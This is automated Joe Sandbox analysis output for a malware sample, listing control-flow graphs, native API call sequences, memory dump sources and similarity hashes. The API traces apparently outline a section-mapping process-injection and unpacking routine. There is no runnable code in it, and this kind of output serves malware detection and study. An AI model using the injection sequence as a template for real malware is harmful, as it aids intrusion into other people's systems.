                                                                                                        control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 151 4018a5-4018b7 147->151 152 401595-4015be 148->152 153 401896 148->153 159 4018c5 151->159 160 4018bc-4018e3 call 401193 151->160 152->153 161 4015c4-4015db NtDuplicateObject 152->161 153->151 159->160 161->153 164 4015e1-401605 NtCreateSection 161->164 166 401661-401687 NtCreateSection 164->166 167 401607-401628 NtMapViewOfSection 164->167 166->153 168 40168d-401691 166->168 167->166 170 40162a-401646 NtMapViewOfSection 167->170 168->153 171 401697-4016b8 NtMapViewOfSection 168->171 170->166 173 401648-40165e 170->173 171->153 174 4016be-4016da NtMapViewOfSection 171->174 173->166 174->153 177 4016e0 call 4016e5 174->177
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1652636561-0
                                                                                                        • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                        • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24
                                                                                                        Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 195 4018a5-4018b7 191->195 196 401595-4015be 192->196 197 401896 192->197 203 4018c5 195->203 204 4018bc-4018e3 call 401193 195->204 196->197 205 4015c4-4015db NtDuplicateObject 196->205 197->195 203->204 205->197 208 4015e1-401605 NtCreateSection 205->208 210 401661-401687 NtCreateSection 208->210 211 401607-401628 NtMapViewOfSection 208->211 210->197 212 40168d-401691 210->212 211->210 214 40162a-401646 NtMapViewOfSection 211->214 212->197 215 401697-4016b8 NtMapViewOfSection 212->215 214->210 217 401648-40165e 214->217 215->197 218 4016be-4016da NtMapViewOfSection 215->218 217->210 218->197 221 4016e0 call 4016e5 218->221
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                        • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24
                                                                                                        Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 234 4018a5-4018b7 230->234 235 401595-4015be 231->235 236 401896 231->236 242 4018c5 234->242 243 4018bc-4018e3 call 401193 234->243 235->236 244 4015c4-4015db NtDuplicateObject 235->244 236->234 242->243 244->236 247 4015e1-401605 NtCreateSection 244->247 249 401661-401687 NtCreateSection 247->249 250 401607-401628 NtMapViewOfSection 247->250 249->236 251 40168d-401691 249->251 250->249 253 40162a-401646 NtMapViewOfSection 250->253 251->236 254 401697-4016b8 NtMapViewOfSection 251->254 253->249 256 401648-40165e 253->256 254->236 257 4016be-4016da NtMapViewOfSection 254->257 256->249 257->236 260 4016e0 call 4016e5 257->260
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                        • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24
                                                                                                        Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 274 4018a5-4018b7 270->274 275 401595-4015be 271->275 276 401896 271->276 282 4018c5 274->282 283 4018bc-4018e3 call 401193 274->283 275->276 284 4015c4-4015db NtDuplicateObject 275->284 276->274 282->283 284->276 287 4015e1-401605 NtCreateSection 284->287 289 401661-401687 NtCreateSection 287->289 290 401607-401628 NtMapViewOfSection 287->290 289->276 291 40168d-401691 289->291 290->289 293 40162a-401646 NtMapViewOfSection 290->293 291->276 294 401697-4016b8 NtMapViewOfSection 291->294 293->289 296 401648-40165e 293->296 294->276 297 4016be-4016da NtMapViewOfSection 294->297 296->289 297->276 300 4016e0 call 4016e5 297->300
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                        • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24
                                                                                                        Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 1921587553-0
                                                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5
                                                                                                        Function 004A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 4a003c-4a0047 1 4a0049 0->1 2 4a004c-4a0263 call 4a0a3f call 4a0e0f call 4a0d90 VirtualAlloc 0->2 1->2 17 4a028b-4a0292 2->17 18 4a0265-4a0289 call 4a0a69 2->18 20 4a02a1-4a02b0 17->20 22 4a02ce-4a03c2 VirtualProtect call 4a0cce call 4a0ce7 18->22 20->22 23 4a02b2-4a02cc 20->23 29 4a03d1-4a03e0 22->29 23->20 30 4a0439-4a04b8 VirtualFree 29->30 31 4a03e2-4a0437 call 4a0ce7 29->31 33 4a04be-4a04cd 30->33 34 4a05f4-4a05fe 30->34 31->29 36 4a04d3-4a04dd 33->36 37 4a077f-4a0789 34->37 38 4a0604-4a060d 34->38 36->34 40 4a04e3-4a0505 36->40 41 4a078b-4a07a3 37->41 42 4a07a6-4a07b0 37->42 38->37 43 4a0613-4a0637 38->43 51 4a0517-4a0520 40->51 52 4a0507-4a0515 40->52 41->42 44 4a086e-4a08be LoadLibraryA 42->44 45 4a07b6-4a07cb 42->45 46 4a063e-4a0648 43->46 50 4a08c7-4a08f9 44->50 48 4a07d2-4a07d5 45->48 46->37 49 4a064e-4a065a 46->49 53 4a07d7-4a07e0 48->53 54 4a0824-4a0833 48->54 49->37 55 4a0660-4a066a 49->55 56 4a08fb-4a0901 50->56 57 4a0902-4a091d 50->57 58 4a0526-4a0547 51->58 52->58 59 4a07e2 53->59 60 4a07e4-4a0822 53->60 62 4a0839-4a083c 54->62 61 4a067a-4a0689 55->61 56->57 66 4a054d-4a0550 58->66 59->54 60->48 63 4a068f-4a06b2 61->63 64 4a0750-4a077a 61->64 62->44 65 4a083e-4a0847 62->65 67 4a06ef-4a06fc 63->67 68 4a06b4-4a06ed 63->68 64->46 69 4a084b-4a086c 65->69 70 4a0849 65->70 72 4a05e0-4a05ef 66->72 73 4a0556-4a056b 66->73 74 4a074b 67->74 75 4a06fe-4a0748 67->75 68->67 69->62 70->44 72->36 76 4a056f-4a057a 73->76 77 4a056d 73->77 74->61 75->74 78 4a059b-4a05bb 76->78 79 4a057c-4a0599 76->79 77->72 84 4a05bd-4a05db 78->84 79->84 84->66
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004A024D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2045012210.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4a0000_derhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: cess$kernel32.dll
                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction ID: e8808fda1f18410e8add9b7d654e39f1dace8b15439fa6e8a781bb971e8400d6
                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction Fuzzy Hash: 74527874A01229DFDB64CF58C984BA8BBB1BF09304F1480DAE90DAB351DB34AE95DF15
                                                                                                        Function 0051EB8C Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 319 51eb8c-51eba5 320 51eba7-51eba9 319->320 321 51ebb0-51ebbc CreateToolhelp32Snapshot 320->321 322 51ebab 320->322 323 51ebcc-51ebd9 Module32First 321->323 324 51ebbe-51ebc4 321->324 322->321 325 51ebe2-51ebea 323->325 326 51ebdb-51ebdc call 51e84b 323->326 324->323 331 51ebc6-51ebca 324->331 329 51ebe1 326->329 329->325 331->320 331->323
                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0051EBB4
                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0051EBD4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2045303884.000000000050C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0050C000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_50c000_derhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 3833638111-0
                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction ID: 848d11fd6c62f46b0253d74a4ff3b31582dfce861c711d36bd776ffb60a503a2
                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction Fuzzy Hash: 07F09C311047116FE7203BF59C8EBEE7AE8BF49724F100569F943910C0D770EC854A51
                                                                                                        Function 004A0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 332 4a0e0f-4a0e24 SetErrorMode * 2 333 4a0e2b-4a0e2c 332->333 334 4a0e26 332->334 334->333
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,004A0223,?,?), ref: 004A0E19
                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,004A0223,?,?), ref: 004A0E1E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2045012210.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4a0000_derhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction ID: 4a69a7ed93f9a29727daf5d7a921b2a81f6fc96308f2a7e4260770afe9c2796a
                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction Fuzzy Hash: F8D0123114512877DB002A94DC09BCE7B1CDF09B62F008411FB0DDD180C774994046E9
                                                                                                        Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                        • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F
                                                                                                        Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                        • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F
                                                                                                        Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                        • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                                                        Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                        • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                        Function 0051E84B Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 444 51e84b-51e885 call 51eb5e 447 51e8d3 444->447 448 51e887-51e8ba VirtualAlloc call 51e8d8 444->448 447->447 450 51e8bf-51e8d1 448->450 450->447
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0051E89C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2045303884.000000000050C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0050C000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_50c000_derhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction ID: a00d14364ddb63b9b723cee9d51e06b425e626dc490d8caec9912d3181ec6e16
                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction Fuzzy Hash: A911FA79A00208EFDB01DF98C985E99BFF5AF08751F1580A4F9489B362D771EA90DB90
                                                                                                        Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
